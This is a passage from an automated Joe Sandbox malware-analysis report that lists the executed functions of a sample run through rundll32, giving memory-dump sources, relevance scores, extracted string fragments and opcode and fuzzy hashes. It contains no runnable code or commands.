                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d55ad6e691fc6e611f51200ae4b7032f0b0244eb7edb3575a70029c7dc42bae3
                                                                                                                                                                                                                                                                            • Instruction ID: ece1b619354f86e14bdfee3bc9a600b576a42f8eafe455e39b98db1f0fed8ae7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d55ad6e691fc6e611f51200ae4b7032f0b0244eb7edb3575a70029c7dc42bae3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BD0A73621421C6B56546654DC46A6A7FADEB892613514433FD0287610DE60AC0583E6
                                                                                                                                                                                                                                                                            Function 06D50440 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000003.1389125739.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_3_6d50000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 52460b5560add2b20b8713ace62288648decc62d3c1aae6536f83b79dd4548f2
                                                                                                                                                                                                                                                                            • Instruction ID: ea86c5ded614af75982911d7895e43246c114bf1e89b22d27933678b648c1a11
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52460b5560add2b20b8713ace62288648decc62d3c1aae6536f83b79dd4548f2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8C01262D4D7C01FD74642500C804A66F20A5B320438E43A6C0408D412A00B075BC3E6

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 06F10040 Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449324041.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_6f10000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: \;q
                                                                                                                                                                                                                                                                            • API String ID: 0-705206692
                                                                                                                                                                                                                                                                            • Opcode ID: 7428c4196b4171d0402be0411a3925a2e35ebfb4c3ca705456413c64d02183f7
                                                                                                                                                                                                                                                                            • Instruction ID: 5c7dcbe3bb1ce689508a246d4b7ffc7d597fdc80886fdbe114600bf8a6ff60e0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7428c4196b4171d0402be0411a3925a2e35ebfb4c3ca705456413c64d02183f7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1225B30E1061ACFDB14DF78C85469DB7B2FF89304F1186AAE845BB250EF74A985CB90
                                                                                                                                                                                                                                                                            Function 04AC746A Relevance: 20.9, Strings: 16, Instructions: 917COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: q$$&q$(_q$4'q$4'q$4'q$4'q$4cq$4cq$@bq$|-q$$q$$q$cq$cq$q
                                                                                                                                                                                                                                                                            • API String ID: 0-2092175375
                                                                                                                                                                                                                                                                            • Opcode ID: 228eae54ed1ea37bba1c6cac18ef2afdebdeeed7dd7686983a55a07da6b2686d
                                                                                                                                                                                                                                                                            • Instruction ID: e1afd5a20e4354481347824a99d5b20ee7ecf693dd9507e57547bc8e57f28953
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 228eae54ed1ea37bba1c6cac18ef2afdebdeeed7dd7686983a55a07da6b2686d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBA2C130D002189FEB259F61D855BEEBBB2FF4A301F2044EAD5096B250DE359E86DF91
                                                                                                                                                                                                                                                                            Function 04AC74C0 Relevance: 20.9, Strings: 16, Instructions: 867COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: q$$&q$(_q$4'q$4'q$4'q$4'q$4cq$4cq$@bq$|-q$$q$$q$cq$cq$q
                                                                                                                                                                                                                                                                            • API String ID: 0-2092175375
                                                                                                                                                                                                                                                                            • Opcode ID: 4451d4a062e144452b986f28d172495d4217374726617791b1e102d615d14464
                                                                                                                                                                                                                                                                            • Instruction ID: 366dbe937a4a1c06cb04081cb9e1c0c6220d4853f467815a0e38fcd0c4ebcd52
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4451d4a062e144452b986f28d172495d4217374726617791b1e102d615d14464
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3192B130D002189FEB259F61D855BEEBBB2FF4A301F2085EAD5096B250DE319E85DF91
                                                                                                                                                                                                                                                                            Function 04ACB9F8 Relevance: 6.5, Strings: 5, Instructions: 269COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$(q$(q$(q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-3372125087
                                                                                                                                                                                                                                                                            • Opcode ID: 9e03d0a9c24aacea784d6d90496435f475aed8b31abe4af8c02d2793f2fe9242
                                                                                                                                                                                                                                                                            • Instruction ID: f4ae288b3e7b9eee5bfa8fd68816a108a4cf2262d9c88a18e86ab0e635cc090c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e03d0a9c24aacea784d6d90496435f475aed8b31abe4af8c02d2793f2fe9242
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6281F431B041148FDB14EF79E45569EBBE6EF88710B1480AEE50ADB3A0EE35ED0187E5
                                                                                                                                                                                                                                                                            Function 04ACB688 Relevance: 5.2, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$\;q$eld$|q
                                                                                                                                                                                                                                                                            • API String ID: 0-975143470
                                                                                                                                                                                                                                                                            • Opcode ID: e3e6fb6d2bfe24544d8bed355675cd260ea5484680db329027b6dbace3a539b7
                                                                                                                                                                                                                                                                            • Instruction ID: ada5d4e7e14a137df5473ff01b6281708dfd9a19074b5327e15b45f899e19f82
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3e6fb6d2bfe24544d8bed355675cd260ea5484680db329027b6dbace3a539b7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2261E379F042164BEB549B7AA85167FB7A7AFD4244B14802EE801D7394EE35FC0387B1
                                                                                                                                                                                                                                                                            Function 04ACA228 Relevance: 3.9, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$(q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-1065528286
                                                                                                                                                                                                                                                                            • Opcode ID: a88d15e60392f30f49a46f46eee68e25c3e9b165d17118eb98e1aff3cf6219ab
                                                                                                                                                                                                                                                                            • Instruction ID: 85ff621be59860e4a3726e8b0da835c14ee6ee0ed7624e19e534221da62f3f0c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a88d15e60392f30f49a46f46eee68e25c3e9b165d17118eb98e1aff3cf6219ab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7941E535B042189FD715CB65C854BAEBFF2EB89710F14819DE806BB351CA35EC02CBA4
                                                                                                                                                                                                                                                                            Function 04AC85C0 Relevance: 2.9, Strings: 2, Instructions: 432COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$d
                                                                                                                                                                                                                                                                            • API String ID: 0-1617062230
                                                                                                                                                                                                                                                                            • Opcode ID: 43ddc96c8061009549a48c260f45f908e6f38c78983ad25af0da27065ddb9bee
                                                                                                                                                                                                                                                                            • Instruction ID: 27cc9e4c4906f8c105bdc79a644497fa114e318d2acf110ebd6afce14ce514b3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43ddc96c8061009549a48c260f45f908e6f38c78983ad25af0da27065ddb9bee
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF1BA34A006058FD760DF19C480A6ABBF2FF89355B25CA6DE46A9B761D734FC42CB90
                                                                                                                                                                                                                                                                            Function 04AC6C20 Relevance: 2.9, Strings: 2, Instructions: 401COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            • Opcode ID: fdf671a39e98941e625fd273b0e81e7bf07a6bd067899370bedcee09fd4c1c20
                                                                                                                                                                                                                                                                            • Instruction ID: feff9ed3158d6c729cc1c11c6b7f19a035392c9fec5e11c0f3febe0bd9f9f0cd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdf671a39e98941e625fd273b0e81e7bf07a6bd067899370bedcee09fd4c1c20
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BD10F35B002168FEB64DB69D49566EBBF2FF89301B24845DE4469B3A5DB30FC42CB81
                                                                                                                                                                                                                                                                            Function 04AC99B8 Relevance: 2.8, Strings: 2, Instructions: 338COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            • Opcode ID: 241fbf7374ef5354e2f86e156d577ddd661e2f7f256b6baf46b497954b963fea
                                                                                                                                                                                                                                                                            • Instruction ID: 3a250ec1fb8d4d0c8b21f2591f7942ab5c38476d4b24d49d40841aeba6d293f3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 241fbf7374ef5354e2f86e156d577ddd661e2f7f256b6baf46b497954b963fea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66E15A74A003598FDB55CFA8C884A9DBBF6FF89300F148199D809AB3A5DB74ED46CB50
                                                                                                                                                                                                                                                                            Function 04ACE1F0 Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (Aq$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-2048478478
                                                                                                                                                                                                                                                                            • Opcode ID: 1125eb43eb0bd08975f8b2da4821f62340933eec279b8fe87380da05fff4a8a6
                                                                                                                                                                                                                                                                            • Instruction ID: 5581f4f58aab925c9ee438dc2dff6dacddf7a5bc02d61dacf725a458a7446842
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1125eb43eb0bd08975f8b2da4821f62340933eec279b8fe87380da05fff4a8a6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0C13B70B102199FDB58DFA9D554AAEBBB6EF88304F144029E406EB394DF74EC06CB91
                                                                                                                                                                                                                                                                            Function 04AC6048 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            • Opcode ID: 09c2fc60c5bbf8e9f9776922e9edd11737169ca022fcbecd035ac7b6fb565a64
                                                                                                                                                                                                                                                                            • Instruction ID: 29de49dbde63ef33b7870607d825dbfd2e7a16e94fdfaac72ac5de048127b0d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09c2fc60c5bbf8e9f9776922e9edd11737169ca022fcbecd035ac7b6fb565a64
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED715E35E003089FEB15EBE5C450B9EBBB3EF88311F108469E116777A0DE396D469B52
                                                                                                                                                                                                                                                                            Function 04AC1630 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: $q$$q
                                                                                                                                                                                                                                                                            • API String ID: 0-3126353813
                                                                                                                                                                                                                                                                            • Opcode ID: a5796d369cbbe68909c9bd5f5387d639aac13ce9b9c8f17ebe91d046e5e4068c
                                                                                                                                                                                                                                                                            • Instruction ID: 0e1eafa2de892f3eefa80b745e5f97647a652b47f9c9902caeb677bc40ee3b19
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5796d369cbbe68909c9bd5f5387d639aac13ce9b9c8f17ebe91d046e5e4068c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE51ED71B013089FDB64DF79D850AAEBBF6FFC9250B14812AE815D7351DA30AC028BA0
                                                                                                                                                                                                                                                                            Function 04ACC4D8 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            • Opcode ID: 5b1726ba7721e061171cb1135e50f5b5c8baec082b233fd3c308ba1a058226b8
                                                                                                                                                                                                                                                                            • Instruction ID: 8aa83dcc45ca3cc0c864f06878e5c14865761a837f08623463c02eaa5cd5b2ef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b1726ba7721e061171cb1135e50f5b5c8baec082b233fd3c308ba1a058226b8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D651C0353047408FD725DB25D458A2ABBF2EFC9310B08C6ADD44A8B665DA34FC06C791
                                                                                                                                                                                                                                                                            Function 04AC4EC0 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$4'q
                                                                                                                                                                                                                                                                            • API String ID: 0-1357480937
                                                                                                                                                                                                                                                                            • Opcode ID: b82f6cc7bf42dd8b13798100cb8f17a9acb534873bb738b8067d80bf8e65b093
                                                                                                                                                                                                                                                                            • Instruction ID: 9146013514f49b3e503aba6e73abbbeb1893a9f0ac5383f22ff3d67c71ef9753
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b82f6cc7bf42dd8b13798100cb8f17a9acb534873bb738b8067d80bf8e65b093
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB419C30B002158FEB58EF69D85065E77A3AFC8245724859EE409DF395DE34EC06CBAA
                                                                                                                                                                                                                                                                            Function 04AC30EC Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$LRq
                                                                                                                                                                                                                                                                            • API String ID: 0-2259313658
                                                                                                                                                                                                                                                                            • Opcode ID: b699b7818677a35e22081b910da91db1cc3db8cccf4845041017cb97a4f153b5
                                                                                                                                                                                                                                                                            • Instruction ID: 518861db62afc8e4a8716e481993325e1f7f3745c3c4d099ef258941b022e7b3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b699b7818677a35e22081b910da91db1cc3db8cccf4845041017cb97a4f153b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE41EF70B042149FEF48AB78985477E7BA7EFC9644F14C46EE806D7391EE34AC068791
                                                                                                                                                                                                                                                                            Function 04ACEA88 Relevance: 2.6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            • Opcode ID: 0a5b178b9e8a5f28d9ba846979df442cb69d605fffa4615e986474e458e6bca1
                                                                                                                                                                                                                                                                            • Instruction ID: 801d39a3e78e5a962d7689a77337f30181445d87902be19c40117ed143d2342f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a5b178b9e8a5f28d9ba846979df442cb69d605fffa4615e986474e458e6bca1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB31BD31B002154FDB189B6DD856A7FBBA6EFC9250714846DE506DB390EE34EC028BA5
                                                                                                                                                                                                                                                                            Function 04AC0C1C Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$uctorAsync
                                                                                                                                                                                                                                                                            • API String ID: 0-3930638032
                                                                                                                                                                                                                                                                            • Opcode ID: 5fecd9a3f1acb52d57bbdc24c0d036ee57fc01e8f636ca1de2510c19d57015fe
                                                                                                                                                                                                                                                                            • Instruction ID: a305582b312026d69380547542601c3130ac5fd8764ab92f09050046a05972e6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fecd9a3f1acb52d57bbdc24c0d036ee57fc01e8f636ca1de2510c19d57015fe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71312630B083049FF759AB78986437E7BF6DFC5204F14846ED402EB286DE746C068B91
                                                                                                                                                                                                                                                                            Function 04AC45C8 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            • Opcode ID: ea528af986f2c9da180a2e4abe723ad6f35dca415ecbee8ebbcb7fa08f2b6d5e
                                                                                                                                                                                                                                                                            • Instruction ID: 52e1e21573bc9a6ee490c36803ae2540336a965818398cde3bd6aeac55316535
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea528af986f2c9da180a2e4abe723ad6f35dca415ecbee8ebbcb7fa08f2b6d5e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D21B035B002008FE7149B2EE45496E77E7EFCD21135984AEE54ACB355DB34EC438B55
                                                                                                                                                                                                                                                                            Function 04AC0D4C Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Async>d__99$ils>
                                                                                                                                                                                                                                                                            • API String ID: 0-4291727702
                                                                                                                                                                                                                                                                            • Opcode ID: 483bd658ad667a1e322f2660a326935e3cb2486670d2ffdca69f521986309682
                                                                                                                                                                                                                                                                            • Instruction ID: 3363f74b6894863b497756a9cd41e893d477dd84b130313c3667bdbf3a6de0ad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 483bd658ad667a1e322f2660a326935e3cb2486670d2ffdca69f521986309682
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F114C32B043542FE715A77898507AE3FEACBC5211F0484AFE509DF281DE29EC0683E5
                                                                                                                                                                                                                                                                            Function 04AC57B8 Relevance: 2.6, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q$eld
                                                                                                                                                                                                                                                                            • API String ID: 0-453229166
                                                                                                                                                                                                                                                                            • Opcode ID: f238ee4681994a5d1c0a1d2ccda0e1486daa33646f2f510f1d8fedc283540098
                                                                                                                                                                                                                                                                            • Instruction ID: 695c1f361abaa7d4e55995ada61fc14a124e6bc640b00c11adbce0a0ab8ed578
